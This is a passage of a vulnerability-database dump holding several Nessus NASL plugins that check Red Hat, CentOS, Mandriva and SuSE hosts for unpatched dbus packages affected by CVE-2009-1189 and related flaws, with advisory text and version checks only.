script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2009-1189\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0018\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0018\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-devel-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", reference:\"dbus-libs-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus / dbus-devel / dbus-libs / dbus-x11\");\n }\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:26:07", "description": "Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.", "edition": 26, "published": "2010-01-08T00:00:00", "title": "CentOS 5 : dbus (CESA-2010:0018)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2010-01-08T00:00:00", "cpe": ["p-cpe:/a:centos:centos:dbus-libs", "p-cpe:/a:centos:centos:dbus-devel", "p-cpe:/a:centos:centos:dbus", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:dbus-x11"], "id": "CENTOS_RHSA-2010-0018.NASL", "href": "https://www.tenable.com/plugins/nessus/43817", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0018 and \n# CentOS Errata and Security Advisory 2010:0018 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(43817);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"RHSA\", value:\"2010:0018\");\n\n script_name(english:\"CentOS 5 : dbus (CESA-2010:0018)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated dbus packages that fix a security issue are now available for\nRed Hat Enterprise Linux 5.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nD-Bus is a system for sending messages between applications. It is\nused for the system-wide message bus service and as a\nper-user-login-session messaging facility.\n\nIt was discovered that the Red Hat Security Advisory RHSA-2009:0008\ndid not correctly fix the denial of service flaw in the system for\nsending messages between applications. A local user could use this\nflaw to send a message with a malformed signature to the bus, causing\nthe bus (and, consequently, any process using libdbus to receive\nmessages) to abort. (CVE-2009-1189)\n\nNote: Users running any application providing services over the system\nmessage bus are advised to test this update carefully before deploying\nit in production environments.\n\nAll users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to\ntake effect, all running instances of dbus-daemon and all running\napplications using the libdbus library must be restarted, or the\nsystem rebooted.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016433.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?155d8856\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2010-January/016434.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dfa0285e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dbus packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-devel-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-libs-1.1.2-12.el5_4.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"dbus-x11-1.1.2-12.el5_4.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dbus / dbus-devel / dbus-libs / dbus-x11\");\n}\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-07T11:52:21", "description": "A vulnerability was discovered and corrected in dbus :\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic to\nvalidate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix for\nCVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers", "edition": 25, "published": "2009-10-07T00:00:00", "title": "Mandriva Linux Security Advisory : dbus (MDVSA-2009:256-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1189", "CVE-2008-3834"], "modified": "2009-10-07T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libdbus-1_3", "p-cpe:/a:mandriva:linux:lib64dbus-1_3", "p-cpe:/a:mandriva:linux:libdbus-1_3-devel", "p-cpe:/a:mandriva:linux:dbus-x11", "cpe:/o:mandriva:linux:2008.0", "p-cpe:/a:mandriva:linux:dbus", "p-cpe:/a:mandriva:linux:lib64dbus-1_3-devel"], "id": "MANDRIVA_MDVSA-2009-256.NASL", "href": "https://www.tenable.com/plugins/nessus/42046", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:256. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42046);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-1189\");\n script_bugtraq_id(31602);\n script_xref(name:\"MDVSA\", value:\"2009:256-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : dbus (MDVSA-2009:256-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A vulnerability was discovered and corrected in dbus :\n\nThe _dbus_validate_signature_with_reason function\n(dbus-marshal-validate.c) in D-Bus (aka DBus) uses incorrect logic to\nvalidate a basic type, which allows remote attackers to spoof a\nsignature via a crafted key. NOTE: this is due to an incorrect fix for\nCVE-2008-3834 (CVE-2009-1189).\n\nThis update provides a fix for this vulnerability.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dbus-x11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64dbus-1_3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64dbus-1_3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libdbus-1_3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libdbus-1_3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2008.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/10/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dbus-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"dbus-x11-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64dbus-1_3-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"x86_64\", reference:\"lib64dbus-1_3-devel-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libdbus-1_3-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", cpu:\"i386\", reference:\"libdbus-1_3-devel-1.0.2-10.4mdv2008.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T06:29:46", "description": "Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.", "edition": 22, "published": "2011-04-29T00:00:00", "title": "SuSE 10 Security Update : dbus (ZYPP Patch Number 7483)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4352", "CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DBUS-1-7483.NASL", "href": "https://www.tenable.com/plugins/nessus/53590", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(53590);\n script_version (\"1.6\");\n script_cvs_date(\"Date: 2019/10/25 13:36:43\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\", \"CVE-2010-4352\");\n\n script_name(english:\"SuSE 10 Security Update : dbus (ZYPP Patch Number 7483)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1189.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4352.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7483.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/04/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-glib-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-gtk-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-java-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-mono-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-python-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-qt3-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-qt3-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, reference:\"dbus-1-x11-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:3, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.29.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-01T06:29:46", "description": "Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.", "edition": 22, "published": "2011-12-13T00:00:00", "title": "SuSE 10 Security Update : dbus (ZYPP Patch Number 7482)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-4352", "CVE-2009-1189", "CVE-2008-3834"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DBUS-1-7482.NASL", "href": "https://www.tenable.com/plugins/nessus/57177", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57177);\n script_version (\"1.4\");\n script_cvs_date(\"Date: 2019/10/25 13:36:43\");\n\n script_cve_id(\"CVE-2008-3834\", \"CVE-2009-1189\", \"CVE-2010-4352\");\n\n script_name(english:\"SuSE 10 Security Update : dbus (ZYPP Patch Number 7482)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Local users could crash the D-Bus daemon by sending a specially\ncrafted message (CVE-2010-4352). This update also properly fixes\nCVE-2008-3834 / CVE-2009-1189.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3834.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-1189.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2010-4352.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 7482.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:P/A:P\");\n script_cwe_id(20);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-glib-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-gtk-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-mono-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-python-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-qt3-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-qt3-devel-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"dbus-1-x11-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-glib-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, cpu:\"x86_64\", reference:\"dbus-1-qt3-32bit-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-0.60-33.29.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"dbus-1-devel-0.60-33.29.1\")) 